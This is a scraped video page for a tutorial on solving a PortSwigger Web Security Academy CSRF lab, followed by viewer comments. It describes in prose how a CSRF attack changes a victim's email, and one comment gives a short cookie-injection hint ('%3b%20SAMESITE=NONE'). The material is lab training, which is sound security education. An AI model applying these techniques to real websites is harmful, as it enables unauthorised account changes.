CSRF - Lab #2 CSRF where token validation depends on request method

CSRF - Lab #2 CSRF where token validation depends on request method | Short Version

Рет қаралды 18,930

Күн бұрын

In this video, we cover Lab #2 in the CSRF module of the Web Security Academy. This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests. To solve the lab, we craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to to our exploit server.
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: academy.ranakhalil.com/p/web-...
▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
CSRF Lab #2 long video: • CSRF - Lab #2 CSRF whe...
Notes.txt document:github.com/rkhal101/Web-Secur...
CSRF Lab #1 (previous video): • CSRF - Lab #1 CSRF vul...
CSRF theory video: • Cross-Site Request For...
Web Security Academy KZfaq Video Series Release Schedule: docs.google.com/spreadsheets/...
Web Security Academy: portswigger.net/web-security/...
Rana's Twitter account: / rana__khalil

Пікірлер: 18

@RanaKhalil101 2 жыл бұрын

Interested in supporting me and gaining early access to the Web Security Academy videos when they're recorded? Consider buying my course: academy.ranakhalil.com/p/web-security-academy-video-series! ✨ ✨

@frolicfox5432 2 жыл бұрын

First things first!! Hats off Mrs. Rana Khalil for this swashbuckling video series!! Ur elucidation of this concept is amazing which made my brain store it so easily! Can't wait for ur other lectures on various portswigger labs as am madly waiting for clickjacking series!! This channel is definitely the next big thing and truly a pentester's delight!! May Allah serve you the best always and bless you! Happy if I receive a reply from you madam!

@user-ni7rd7st8z Жыл бұрын

thank. I will follow your course

@brucebane7401 2 жыл бұрын

amazing!!!!!

@_____pd____5919 2 жыл бұрын

🔥🔥🔥

@user-ni7rd7st8z Жыл бұрын

thank

@S2eedGH Жыл бұрын

thanks a lot, Can you please explain more about the third condition (no unpredictable request parameters) ? at 03:34

@deadeye821 2 жыл бұрын

which cookie editor do u use and how to install it?

@saikrishnapuli6591 2 жыл бұрын

without deleting csrf token in the post method i have changed mail id and it worked

@rafinrahmanchy 2 жыл бұрын

Use the term "Exploitability" besides of "Analysis". It suites better

@bishalshrestha3880 2 жыл бұрын

First 😳

@etc.4792 Жыл бұрын

i'm followed all of your process but my lab is not solving and not congratulated me. please give me solution

@heyybigdaddy6988 Ай бұрын

did it work for you?

@naveenrawat1549 Ай бұрын

First store then view and then deliver

@heyybigdaddy6988 29 күн бұрын

@@naveenrawat1549 nah. It was due to LAX being implemented in all the browsers. This video is old and doesn't tell you to add %3b%20SAMESITE=NONE after your csrf key.

@naveenrawat1549 29 күн бұрын

@@heyybigdaddy6988 ohh I got it but have you done same session csrf key I got stuck there

@naveenrawat1549 22 күн бұрын

@@heyybigdaddy6988 brother help me how do I put this I am just after csrf key or somewhere else ? I mean if csrf= abcd12 then where do I put this